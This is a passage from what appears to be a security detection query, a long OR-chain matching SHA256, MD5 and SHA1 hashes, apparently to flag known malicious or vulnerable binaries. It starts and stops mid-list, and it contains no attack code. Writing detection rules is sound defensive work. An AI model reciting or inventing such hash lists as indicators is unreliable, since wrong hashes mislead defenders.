'%SHA256=fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af%' ESCAPE '\\' OR Hashes LIKE '%SHA256=58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495%' ESCAPE '\\' OR Hashes LIKE '%SHA256=dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21%' ESCAPE '\\' OR Hashes LIKE '%SHA256=91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b%' ESCAPE '\\') OR md5 IN ('1b5c3c458e31bede55145d0644e88d75', '6f5d54ab483659ac78672440422ae3f1', 'ee6b1a79cb6641aa44c762ee90786fe0', 'c02f70960fa934b8defa16a03d7f6556', '839cbbc86453960e9eb6db814b776a40', 'acac842a46f3501fe407b1db1b247a0b', '95e4c7b0384da89dce8ea6f31c3613d9', 'e700a820f117f65e813b216fccbf78c9', '96b463b6fa426ae42c414177af550ba2', '27bcbeec8a466178a6057b64bef66512', '70dcd07d38017b43f710061f37cb4a91', 'db72def618cbc3c5f9aa82f091b54250', '83601bbe5563d92c1fdb4e960d84dc77', '5970e8de1b337ca665114511b9d10806', '49fe3d1f3d5c2e50a0df0f6e8436d778', 
'1493d342e7a36553c56b2adea150949e', '4f191abc652d8f7442ca2636725e1ed6', '0ae30291c6cbfa7be39320badd6e8de0', 'd104621c93213942b7b43d65b5d8d33e', 'b89b097b8b8aecb8341d05136f334ebb', '14580bd59c55185115fd3abe73b016a2', '992ded5b623be3c228f32edb4ca3f2d2', 'a26e600652c33dd054731b4693bf5b01', '1f950cfd5ed8dd9de3de004f5416fe20', '491aec2249ad8e2020f9f9b559ab68a8', 'e4266262a77fffdea2584283f6c4f51d', 'bd25be845c151370ff177509d95d5add', '9638f265b1ddd5da6ecdf5c0619dcbe6', '4e90cd77509738d30d3181a4d0880bfa', '0a6a1c9a7f80a2a5dcced5c4c0473765', '9aa7ed7809eec0d8bc6c545a1d18107a', 'aa1ed3917928f04d97d8a217fe9b5cb1', '42f7cc4be348c3efd98b0f1233cf2d69', '4cc3ddd5ae268d9a154a426af2c23ef9', '2fed983ec44d1e7cffb0d516407746f2', 'f7cbbb5eb263ec9a35a1042f52e82ca4', 'ed6348707f177629739df73b97ba1b6e', '40bc58b7615d00eb55ad9ba700c340c1', 'c3fea895fe95ea7a57d9f4d7abed5e71', '2128e6c044ee86f822d952a261af0b48', '3dbf69f935ea48571ea6b0f5a2878896', 'c6f8983dd3d75640c072a8459b8fa55a', '6fcf56f6ca3210ec397e55f727353c4a', '79f7e6f98a5d3ab6601622be4471027f', 'bae1f127c4ff21d8fe45e2bbfc59c180', 'c533d6d64b474ffc3169a0e0fc0a701a', '3f39f013168428c8e505a7b9e6cba8a2', '748cf64b95ca83abc35762ad2c25458f', 'bce7f34912ff59a3926216b206deb09f', '2d8e4f38b36c334d0a32a7324832501d', '47e6ac52431ca47da17248d80bf71389', '3651a6990fe38711ebb285143f867a43', 'dc943bf367ae77016ae399df8e71d38a', '02198692732722681f246c1b33f7a9d9', 'ddc2ffe0ab3fcd48db898ab13c38d88d', '0ec361f2fba49c73260af351c39ff9cb', 'c1fce7aac4e9dd7a730997e2979fa1e2', '49938383844ceec33dba794fb751c9a5', '34069a15ae3aa0e879cd0d81708e4bcc', '1c294146fc77565030603878fd0106f9', 'fd81af62964f5dd5eb4a828543a33dcf', 'bd5b0514f3b40f139d8079138d01b5f6', 'fa173832dca1b1faeba095e5c82a1559', '5cc5c26fc99175997d84fe95c61ab2c2', '1ed043249c21ab201edccb37f1d40af9', '361a598d8bb92c13b18abb7cac850b01', '9b359b722ac80c4e0a5235264e1e0156', '296bde4d0ed32c6069eb90c502187d0d', 'd3e40644a91327da2b1a7241606fe559', '12cecc3c14160f32b21279c1a36b8338', 
'dd39a86852b498b891672ffbcd071c03', 'b2a9ac0600b12ec9819e049d7a6a0b75', '444f538daa9f7b340cfd43974ed43690', '7b43dfd84de5e81162ebcfafb764b769', '13dda15ef67eb265869fc371c72d6ef0', '300c5b1795c9b6cc1bc4d7d55c7bbe85', '1392b92179b07b672720763d9b1028a5', '2e1f8a2a80221deb93496a861693c565', '8065a7659562005127673ac52898675f', 'b5ada7fd226d20ec6634fc24768f9e22', '84fb76ee319073e77fb364bbbbff5461', 'daf800da15b33bf1a84ee7afc59f0656', 'f7393fb917aed182e4cbef25ce8af950', '120b5bbb9d2eb35ff4f62d79507ea63a', '73c98438ac64a68e88b7b0afd11ba140', '51207adb8dab983332d6b22c29fe8129', '4a23e0f2c6f926a41b28d574cbc6ac30', '20125794b807116617d43f02b616e092', 'e8ebba56ea799e1e62748c59e1a4c586', '8abbb12e61045984eda19e2dc77b235e', 'f66b96aa7ae430b56289409241645099', '97e3a44ec4ae58c8cc38eefc613e950e', 'ff7b31fa6e9ab923bce8af31d1be5bb2', '12908c285b9d68ee1f39186110df0f1e', '6126065af2fc2639473d12ee3c0c198e', '356bda2bf0f6899a2c08b2da3ec69f13', 'fd7de498a72b2daf89f321d23948c3c4', '338a98e1c27bc76f09331fcd7ae413a5', 'c9a293762319d73c8ee84bcaaf81b7b3', 'e9e786bdba458b8b4f9e93d034f73d00', 'a17c58c0582ee560c72f60764ed63224', '21e13f2cb269defeae5e1d09887d47bb', 'a57b47489febc552515778dd0fd1e51c', 'd6e9f6c67d9b3d790d592557a7d57c3c', '76bb1a4332666222a8e3e1339e267179', '1cd158a64f3d886357535382a6fdad75', 'd9e7e5bcc5b01915dbcef7762a7fc329', 'd253c19194a18030296ae62a10821640', 'b12d1630fd50b2a21fd91e45d522ba3a', '50b39072d0ee9af5ef4824eca34be6e3', '778b7feea3c750d44745d3bf294bd4ce', '0761c357aed5f591142edaefdf0c89c8', '23cf3da010497eb2bf39a5c5a57e437c', 'c49a1956a6a25ffc25ad97d6762b0989', 'f406c5536bcf9bacbeb7ce8a3c383bfa', 'f2f728d2f69765f5dfda913d407783d2', '4b817d0e7714b9d43db43ae4a22a161e', '715f8efab1d1c660e4188055c4b28eed', 'a01c412699b6f21645b2885c2bae4454', '010c0e5ac584e3ab97a2daf84cf436f5', 'd5db81974ffda566fa821400419f59be', '3247014ba35d406475311a2eab0c4657', '4d487f77be4471900d6ccbc47242cc25', '1f2888e57fdd6aee466962c25ba7d62d', '507a649eb585d8d0447eab0532ef0c73', 
'4ad8fd9e83d7200bd7f8d0d4a9abfb11', 'cd9f0fcecf1664facb3671c0130dc8bb', 'b10b210c5944965d0dc85e70a0b19a42', 'ae5eb2759305402821aeddc52ba9a6d6', 'f5051c756035ef5de9c4c48bacb0612b', '1898ceda3247213c084f43637ef163b3', '37086ae5244442ba552803984a11d6cb', '825703c494e0d270f797f1ecf070f698', '909f3fc221acbe999483c87d9ead024a', '75d6c3469347de1cdfa3b1b9f1544208', '9ab9f3b75a2eb87fafb1b7361be9dfb3', '5f9785e7535f8f602cb294a54962c9e7', '7d46d0ddaf8c7e1776a70c220bf47524', 'f9844524fb0009e5b784c21c7bad4220', '828bb9cb1dd449cd65a29b18ec46055f', '4d17b32be70ef39eae5d5edeb5e89877', '2391fb461b061d0e5fccb050d4af7941', '6d4159694e1754f262e326b52a3b305a', 'a60c9173563b940203cf4ad38ccf2082', '63e333d64a8716e1ae59f914cb686ae8', 'a9f220b1507a3c9a327a99995ff99c82', 'c5f5d109f11aadebae94c77b27cb026f', '5bab40019419a2713298a5c9173e5d30', 'c996d7971c49252c582171d9380360f2', '98763a3dee3cf03de334f00f95fc071a', 'e79c91c27df3eaf82fb7bd1280172517', 'a42249a046182aaaf3a7a7db98bfa69d', '803a371a78d528a44ef8777f67443b16', '9007c94c9d91ccff8d7f5d4cdddcc403', '11fb599312cb1cf43ca5e879ed6fb71e', '7f9309f5e4defec132b622fadbcad511', '04a88f5974caa621cee18f34300fc08a', '8636fe3724f2bcba9399daffd6ef3c7e', '9dfd73dadb2f1c7e9c9d2542981aaa63', '490b1f404c4f31f4538b36736c990136', 'c1d063c9422a19944cdaa6714623f2ec', 'dacb62578b3ea191ea37486d15f4f83c', '2da209dde8188076a9579bd256dc90d0', '0ba6afe0ea182236f98365bd977adfdf', '4c016fd76ed5c05e84ca8cab77993961', 'ad22a7b010de6f9c6f39c350a471a440', '79483cb29a0c428e1362ec8642109eee', 'a179c4093d05a3e1ee73f6ff07f994aa', 'ccf523b951afaa0147f22e2a7aae4976', '736c4b85ce346ddf3b49b1e3abb4e72a', 'b0baac4d6cbac384a633c71858b35a2e', '798de15f187c1f013095bbbeb6fb6197', 'a86150f2e29b35369afa2cafd7aa9764', 'b941c8364308990ee4cc6eadf7214e0f', 'dd04cd3de0c19bede84e9c95a86b3ca8', '6909b5e86e00b4033fedfca1775b0e33', '9b91a44a488e4d539f2e55476b216024', '8b287636041792f640f92e77e560725e', '07f83829e7429e60298440cd1e601a6a', '0395b4e0eb21693590ad1cfdf7044b8b', 
'4b058945c9f2b8d8ebc485add1101ba5', '0067c788e1cb174f008c325ebde56c22', 'c2c1b8c00b99e913d992a870ed478a24', '84ba7af6ada1b3ea5efb9871a0613fc6', 'dbc415304403be25ac83047c170b0ec2', '31469f1313871690e8dc2e8ee4799b22', '2d465b4487dc81effaa84f122b71c24f', '64efbffaa153b0d53dc1bccda4279299', 'b164daf106566f444dfb280d743bc2f7', '7c72a7e1d42b0790773efd8700e24952', '56a515173b211832e20fbc64e5a0447c', 'c2eb4539a4f6ab6edd01bdc191619975', 'd1bac75205c389d6d5d6418f0457c29b', '68dde686d6999ad2e5d182b20403240b', 'a785b3bc4309d2eb111911c1b55e793f', '6ab7b8ef0c44e7d2d5909fdb58d37fa5', 'd9ce18960c23f38706ae9c6584d9ac90', 'ab53d07f18a9697139ddc825b466f696', 'ba5f0f6347780c2ed911bbf888e75bef', '13ee349c15ee5d6cf640b3d0111ffc0e', '9a237fa07ce3ed06ea924a9bed4a6b99', 'fa222bed731713904320723b9c085b11', '0898af0888d8f7a9544ef56e5e16354e', 'e076dadf37dd43a6b36aeed957abee9e', '4f27c09cc8680e06b04d6a9c34ca1e08', '1b32c54b95121ab1683c7b83b2db4b96', '715572dfe6fb10b16f980bfa242f3fa5', '4a06bcd96ef0b90a1753a805b4235f28', 'f242cffd9926c0ccf94af3bf16b6e527', '7ed6030f14e66e743241f2c1fa783e69', '0d6fef14f8e1ce5753424bd22c46b1ce', 'a4fda97f452b8f8705695a729f5969f7', '62c18d61ed324088f963510bae43b831', 'd5a642329cce4df94b8dc1ba9660ae34', 'a641e3dccba765a10718c9cb0da7879e', 'ed07f1a8038596574184e09211dfc30f', '3473faea65fba5d4fbe54c0898a3c044', '708ac9f7b12b6ca4553fd8d0c7299296', 'bbe4f5f8b0c0f32f384a83ae31f49a00', '257483d5d8b268d0d679956c7acdf02d', '312e31851e0fc2072dbf9a128557d6ef', '14eead4d42728e9340ec8399a225c124', 'de1cc5c266140bff9d964fab87a29421', '9a9dbf5107848c254381be67a4c1b1dd', '1dc94a6a82697c62a04e461d7a94d0b0', '2850608430dd089f24386f3336c84729', '6d131a7462e568213b44ef69156f10a5', 'b8b6686324f7aa77f570bc019ec214e6', '22823fed979903f8dfe3b5d28537eb47', 'c1d3a6bb423739a5e781f7eee04c9cfd', '0c0195c48b6b8582fa6f6373032118da', '5228b7a738dc90a06ae4f4a7412cb1e9', '62f02339fe267dc7438f603bfb5431a1', '22949977ce5cd96ba674b403a9c81285', '5ca1922ed5ee2b533b5f3dd9be20fd9a', 
'1ed08a6264c5c92099d6d1dae5e8f530', 'b0770094c3c64250167b55e4db850c04', 'a6e9d6505f6d2326a8a9214667c61c67', '8407ddfab85ae664e507c30314090385', '9321a61a25c7961d9f36852ecaa86f55', 'a711e6ab17802fabf2e69e0cd57c54cd', '29ccff428e5eb70ae429c3da8968e1ec', '79df0eabbf2895e4e2dae15a4772868c', 'fb7c61ef427f9b2fdff3574ee6b1819b', 'f778489c7105a63e9e789a02412aaa5f', 'fef9dd9ea587f8886ade43c1befbdafe', '43830326cd5fae66f5508e27cbec39a0', 'c7a57cd4bea07dadba2e2fb914379910', 'f1e054333cc40f79cfa78e5fbf3b54c2', 'dc564bac7258e16627b9de0ce39fae25', '054299e09cea38df2b84e6b29348b418', '97221e16e7a99a00592ca278c49ffbfc', '8d63e1a9ff4cafee1af179c0c544365c', '96421b56dbda73e9b965f027a3bda7ba', '4ae55080ec8aed49343e40d08370195c', '988dabdcf990b134b0ac1e00512c30c4', 'bbbc9a6cc488cfb0f6c6934b193891eb', '76c643ab29d497317085e5db8c799960', 'e9a30edef1105b8a64218f892b2e56ed', '7bd840ff7f15df79a9a71fec7db1243e', '1cff7b947f8c3dea1d34dc791fc78cdc', '2c54859a67306e20bfdc8887b537de72', 'a5f637d61719d37a5b4868c385e363c0', '2509a71a02296aa65a3428ddfac22180', '6cce5bb9c8c2a8293df2d3b1897941a2', '7a16fca3d56c6038c692ec75b2bfee15', 'eaea9ccb40c82af8f3867cd0f4dd5e9d', 'd2588631d8aae2a3e54410eaf54f0679', 'b47dee29b5e6e1939567a926c7a3e6a4', 'fac8eb49e2fd541b81fcbdeb98a199cb', '1a234f4643f5658bab07bfa611282267', '0752f113d983030939b4ab98b0812cf0') OR sha1 IN ('f0c463d29a5914b01e4607889094f1b7d95e7aaf', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '684786de4b3b3f53816eae9df5f943a22c89601f', '745335bcdf02fb42df7d890a24858e16094f48fd', '25d812a5ece19ea375178ef9d60415841087726e', 'd417c0be261b0c6f44afdec3d5432100e420c3ed', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', '7e836dadc2e149a0b758c7e22c989cbfcce18684', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'bc2f3850c7b858340d7ed27b90e63b036881fd6c', 'e22495d92ac3dcae5eeb1980549a9ead8155f98a', 
'c969f1f73922fd95db1992a5b552fbc488366a40', '4c18754dca481f107f0923fb8ef5e149d128525d', '2fc6845047abcf2a918fce89ab99e4955d08e72c', '4f7a8e26a97980544be634b26899afbefb0a833c', '21edff2937eb5cd6f6b0acb7ee5247681f624260', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '6c1bb3a72ebfb5359b9e22ca44d0a1ff825a68f2', '064de88dbbea67c149e779aac05228e5405985c7', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '55ab7e27412eca433d76513edc7e6e03bcdd7eda', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', 'a6816949cd469b6e5c35858d19273936fab1bef6', '91f832f46e4c38ecc9335460d46f6f71352cffed', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '01779ee53f999464465ed690d823d160f73f10e7', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', '27d3ebea7655a72e6e8b95053753a25db944ec0f', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', '10115219e3595b93204c70eec6db3e68a93f3144', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '2c27abbbbcf10dfb75ad79557e30ace5ed314df8', '10e15ba8ff8ed926ddd3636cec66a0f08c9860a4', '291b4a88ffd2ac1d6bf812ecaedc2d934dc503cb', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', 'a7948a4e9a3a1a9ed0e4e41350e422464d8313cd', '19bd488fe54b011f387e8c5d202a70019a204adf', 'eeff4ec4ebc12c6acd2c930dc2eaaf877cfec7ec', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', 'd02403f85be6f243054395a873b41ef8a17ea279', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '4789b910023a667bee70ff1f1a8f369cffb10fe8', '50e2bc41f0186fdce970b80e2a2cb296353af586', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', 'e039c9dd21494dbd073b4823fc3a17fbb951ec6c', '806832983bb8cb1e26001e60ea3b7c3ade4d3471', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', 'a3ed5cbfbc17b58243289f3cf575bf04be49591d', '7fb52290883a6b69a96d480f2867643396727e83', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', 'da9cea92f996f938f699902482ac5313d5e8b28e', 
'dc7b022f8bd149efbcb2204a48dce75c72633526', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '51b60eaa228458dee605430aae1bc26f3fc62325', 'c6bd965300f07012d1b651a9b8776028c45b149a', '729a8675665c61824f22f06c7b954be4d14b52c4', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'e4436c8c42ba5ffabd58a3b2256f6e86ccc907ab', '7ba19a701c8af76988006d616a5f77484c13cb0a', '25bf4e30a94df9b8f8ab900d1a43fd056d285c9d', 'd8498707f295082f6a95fd9d32c9782951f5a082', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '943593e880b4d340f2548548e6e673ef6f61eed3', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '4a7d66874a0472a47087fabaa033a85d47413379', '012db3a80faf1f7f727b538cbe5d94064e7159de', '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4', 'c6d349823bbb1f5b44bae91357895dba653c5861', '643383938d5e0d4fd30d302af3e9293a4798e392', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '1d0df45ee3fa758f0470e055915004e6eae54c95', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', 'd5fd9fe10405c4f90235e583526164cd0902ed86', '0c74d09da7baf7c05360346e4c3512d0cd433d59', '9c256edd10823ca76c0443a330e523027b70522d', '65d8a7c2e867b22d1c14592b020c548dd0665646', '7859e75580570e23a1ef7208b9a76f81738043d5', 'b242b0332b9c9e8e17ec27ef10d75503d20d97b6', '6523b3fd87de39eb5db1332e4523ce99556077dc', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'fe10018af723986db50701c8532df5ed98b17c39', 'b9807b8840327c6d7fbdde45fc27de921f1f1a82', 'a3636986cdcd1d1cb8ab540f3d5c29dcc90bb8f0', '054a50293c7b4eea064c91ef59cf120d8100f237', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', '485c0b9710a196c7177b99ee95e5ddb35b26ddd1', 'faa870b0cb15c9ac2b9bba5d0470bd501ccd4326', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', '0291d0457acaf0fe8ed5c3137302390469ce8b35', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', '5a7dd0da0aee0bdedc14c1b7831b9ce9178a0346', 
'6debce728bcff73d9d1d334df0c6b1c3735e295c', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '19f3343bfad0ef3595f41d60272d21746c92ffca', 'a48aa80942fc8e0699f518de4fd6512e341d4196', 'f6f11ad2cd2b0cf95ed42324876bee1d83e01775', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'ea360a9f23bb7cf67f08b88e6a185a699f0c5410', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', '08596732304351b311970ff96b21f451f23b1e25', '29a190727140f40cea9514a6420f5a195e36386b', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', '31fac347aa26e92db4d8c9e1ba37a7c7a2234f08', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', 'f052dc35b74a1a6246842fbb35eb481577537826', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'a7d827a41b2c4b7638495cd1d77926f1ba902978', 'c23eeb6f18f626ce1fd840227f351fa7543bb167', '3805e4e08ad342d224973ecdade8b00c40ed31be', '8302802b709ad242a81b939b6c90b3230e1a1f1e', 'ac13941f436139b909d105ad55637e1308f49d9a', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '623cd2abef6c92255f79cbbd3309cb59176771da', 'af50109b112995f8c82be8ef3a88be404510cdde', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '7eec3a1edf3b021883a4b5da450db63f7c0afeeb', '078ae07dec258db4376d5a2a05b9b508d68c0123', 'ef80da613442047697bec35ea228cde477c09a3d', '6003184788cd3d2fc624ca801df291ccc4e225ee', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '877c6c36a155109888fe1f9797b93cb30b4957ef', 'f3cce7e79ab5bd055f311bb3ac44a838779270b6', '80fa962bdfb76dfcb9e5d13efc38bb3d392f2e77', '3b6b35bca1b05fafbfc883a844df6d52af44ccdc', '351cbd352b3ec0d5f4f58c84af732a0bf41b4463', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '71469dce9c2f38d0e0243a289f915131bf6dd2a8', '05ac1c64ca16ab0517fe85d4499d08199e63df26', '2261198385d62d2117f50f631652eded0ecc71db', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 
'8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'd702d88b12233be9413446c445f22fda4a92a1d9', 'e74b6dda8bc53bc687fc21218bd34062a78d8467', 'a197a02025946aca96d6e74746f84774df31249e', '1f25f54e9b289f76604e81e98483309612c5a471', 'e3c1dd569aa4758552566b0213ee4d1fe6382c4b', '879fcc6795cebe67718388228e715c470de87dca', '3ae56ab63230d6d9552360845b4a37b5801cc5ea', '74e4e3006b644392f5fcea4a9bae1d9d84714b57', 'ce549714a11bd43b52be709581c6e144957136ec', '3abb9d0a9d600200ae19c706e570465ef0a15643', 'fbf8b0613a2f7039aeb9fa09bd3b40c8ff49ded2', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'b03b1996a40bfea72e4584b82f6b845c503a9748', '0307d76750dd98d707c699aee3b626643afb6936', '8db869c0674221a2d3280143cbb0807fac08e0cc', '2f991435a6f58e25c103a657d24ed892b99690b8', 'c948ae14761095e4d76b55d9de86412258be7afd', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'aca8e53483b40a06dfdee81bb364b1622f9156fe', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', '3ee2fd08137e9262d2e911158090e4a7c7427ea0', '4e826430a1389032f3fe06e2cc292f643fb0c417', '745bad097052134548fe159f158c04be5616afc2', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6765d8866cad6193df1507c18f31fa7f723ca3e', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '57511ef5ff8162a9d793071b5bf7ebe8371759de', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'c834c4931b074665d56ccab437dfcc326649d612', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', '14bf0eaa90e012169745b3e30c281a327751e316', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 
'fff4f28287677caabc60c8ab36786c370226588d', '34c85afe6d84cd3deec02c0a72e5abfa7a2886c3', '3f223581409492172a1e875f130f3485b90fbe5f', '282bb241bda5c4c1b8eb9bf56d018896649ca0e1', 'f1c8c3926d0370459a1b7f0cf3d17b22ff9d0c7f', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'd569d4bab86e70efbcdfdac9d822139d6f477b7c', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', 'a65fabaf64aa1934314aae23f25cdf215cbaa4b6', 'c257aa4094539719a3c7b7950598ef872dbf9518', '1292c7dd60214d96a71e7705e519006b9de7968f', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '994dc79255aeb662a672a1814280de73d405617a', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', '21e6c104fe9731c874fab5c9560c929b2857b918', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', 'bb962c9a8dda93e94fef504c4159de881e4706fe', '82ba5513c33e056c3f54152c8555abf555f3e745', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f02af84393e9627ba808d4159841854a6601cf80', 